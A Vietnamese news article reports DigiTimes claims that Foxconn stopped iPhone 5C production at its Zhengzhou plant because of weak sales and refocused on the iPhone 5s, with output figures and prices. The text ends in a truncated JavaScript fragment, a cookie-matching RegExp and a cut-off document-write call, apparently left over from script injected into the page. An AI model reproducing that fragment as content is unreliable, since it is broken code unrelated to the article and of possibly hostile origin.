Foxconn ngừng sản xuất iPhone 5C

Tờ DigiTimes cho biết, nhà máy chuyên sản xuất thiết bị cho Apple là Foxconn đã ngừng sản xuất iPhone 5C, vì nhu cầu của người dùng và doanh số bán ra của chiếc iPhone vỏ nhựa này quá thấp.

Đây không phải là lần đầu tiên thông tin này được đưa ra. Hồi đầu tháng 10, đã có nhiều thông tin cho rằng, Apple đang giảm một nửa sản lượng sản xuất iPhone 5C bởi nhu cầu và lượng máy án ra quá ít ỏi.

Doanh số bán ra quá thấp

Doanh số bán ra của iPhone 5C quá thấp

Chỉ vài ngày trước đây, giới thạo tin đã kháo với nhau rằng, Apple đang cắt giảm sản lượng sản xuất iPhone 5C tại nhà máy Zhengzhou của Foxconn từ 50 000 xuống còn 8000 chiếc/ngày.

Và giờ đây thông tin đó đã chuyển thành nhà máy Zhengzhou sẽ ngừng việc sản xuất iPhone 5C và chuyển sang tập trung sản xuất iPhone 5s.

Foxconn không phải là nhà sản xuất chính cho chiếc iPhone vỏ nhựa, nhưng họ đang đảm nhiệm 30 % sản lượng sản xuát dòng sản phẩm này. Còn công ty Pegatrong Technology đảm nhận 70% sản lượng.

Sau sự kiện phát hành vào ngày 10/09, iPhone 5s được đánh giá là sẽ giảm doanh số bán ra, bời nhiều người dùng sẽ tiết kiệm chi tiêu bằng cách mua sản phẩm có gí rẻ hơn. Tuy nhiên, trên thực tế lại ngược lại.

Tập trung sản xuất iPhone 5s

Apple ngừng sản xuất iPhone 5C và tập trung cho việc sản xuất iPhone 5s

Theo DigiTimes, nhà máy Foxconn ở Zhengzhou có 120 nghìn công nhân sẽ tập trung vào sản xuất cho chiếc iPhone cao cấp. Không giống như người đồng nhiệm của mình, iPhone 5s sở hữu một thiết kế vỏ nhôm tuyệt đẹp, bộ cảm biến quét vân tay được tích hợp vào nút Home và công thêm với sức mạnh của bộ xử lý A7 có cấu trúc 64 bit.

Giá bán của bộ đôi sản phẩm này là hoàn toàn khác nhau, giá iPhone 5s khởi điểm  từ 199 USD đối với bản 16GB và iPhone 5C có giá 99 USD.

Hiện Apple vẫn chưa có bất kỳ động thái nào đối với thông tin trên. Tuy nhiên, có một điểm khá lạ là mặc dù doanh thu và doanh số bán ra của Apple vẫn đang trên đà tăng cao, nhưng trên thực tế, họ chưa hề tiết lộ về doanh số thực của iPhone 5C. Có vẻ như, chiếc iPhone vỏ nhựa không đảm nhận tốt sứ mệnh của mình khi tung ra thị trường. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘